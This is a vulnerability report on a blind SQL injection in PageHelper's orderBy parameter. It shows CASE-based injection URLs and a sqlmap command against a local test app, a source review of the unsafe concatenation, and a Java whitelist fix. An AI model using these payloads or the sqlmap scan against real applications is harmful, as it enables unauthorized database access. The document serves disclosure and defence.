PageHelper SQL injection vulnerability: validation process
Note: a Boolean-based blind and time-based blind SQL injection vulnerability exists in the orderBy parameter of PageHelper.
Official website: https://pagehelper.github.io/
Source code: https://github.com/pagehelper/Mybatis-PageHelper
Git: https://github.com/pagehelper/Mybatis-PageHelper.git
Verification Process:
1. Local environment: SpringBoot + MyBatis + Maven + MySQL
2. Visit a page that accepts the sort parameter orderBy
3. Visit URL: http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN (1=1)THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))
4. Visit URL: http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN (1=2)THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))
5. Scan with sqlmap, command: python3 sqlmap.py -u "http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=costprice*" --batch --dbms=mysql
Source code review:
1. In the converToOrderBySql function of \com\github\pagehelper\parser\OrderByParser.java, the mapper's SQL statement is concatenated with pageNum, pageSize, and orderBy
2. The function directly concatenates the mapper SQL statement [select * from book] with the value submitted in the orderBy parameter [(SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))]
3. The value returned by converToOrderBySql is assigned to sql: sql = SELECT * FROM book order by (SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))
4. getPageSql then concatenates sql with LIMIT to form the final query statement
5. In MySQL, you can view the history of executed SQL statements and see that the value submitted in the orderBy parameter is placed verbatim into the executed query: [ SELECT * FROM book order by (SELECT (CASE WHEN (1=2) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END)) LIMIT 10 ]
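Because converToOrderBySql concatenates whatever string it receives, the application must never hand the raw orderBy request parameter to PageHelper. As an added example (not code from the PageHelper project or from this report), the check below maps the parameter onto a fixed set of column names before the result is passed to PageHelper.startPage(pageNum, pageSize, orderBy); the column names are assumptions based on the book table and costprice column used above.

```java
import java.util.Map;
import java.util.regex.Pattern;

/**
 * Added example, not PageHelper project code: translate the user-supplied sort key
 * into a known column name instead of concatenating the raw orderBy string.
 * The column list is an assumption based on the "book" table used in the report.
 */
public class OrderByWhitelist {

    // User-facing sort keys (left) mapped to the real column names (right).
    private static final Map<String, String> SORT_COLUMNS = Map.of(
            "costprice", "costprice",
            "title", "title",
            "id", "id");

    // The only accepted direction tokens; anything else is rejected.
    private static final Pattern DIRECTION = Pattern.compile("(?i)asc|desc");

    /**
     * Returns a safe "column [ASC|DESC]" string suitable for
     * PageHelper.startPage(pageNum, pageSize, orderBy), or throws when the
     * input is not a whitelisted key. Subqueries, parentheses and sqlmap's
     * "*" marker all fail the lookup, so they never reach the SQL string.
     */
    public static String toSafeOrderBy(String orderBy) {
        if (orderBy == null || orderBy.isBlank()) {
            return "id"; // fixed default ordering when nothing is supplied
        }
        String[] parts = orderBy.trim().split("\\s+");
        if (parts.length > 2) {
            throw new IllegalArgumentException("orderBy rejected: " + orderBy);
        }
        String column = SORT_COLUMNS.get(parts[0].toLowerCase());
        if (column == null) {
            throw new IllegalArgumentException("orderBy rejected: " + orderBy);
        }
        if (parts.length == 2) {
            if (!DIRECTION.matcher(parts[1]).matches()) {
                throw new IllegalArgumentException("orderBy rejected: " + orderBy);
            }
            return column + " " + parts[1].toUpperCase();
        }
        return column;
    }

    public static void main(String[] args) {
        // A legitimate sort request passes through as a known column plus direction.
        System.out.println(toSafeOrderBy("costprice desc"));
        // The CASE expression from the report above is refused before PageHelper sees it.
        String payload = "(SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))";
        try {
            toSafeOrderBy(payload);
        } catch (IllegalArgumentException e) {
            System.out.println(e.getMessage());
        }
    }
}
```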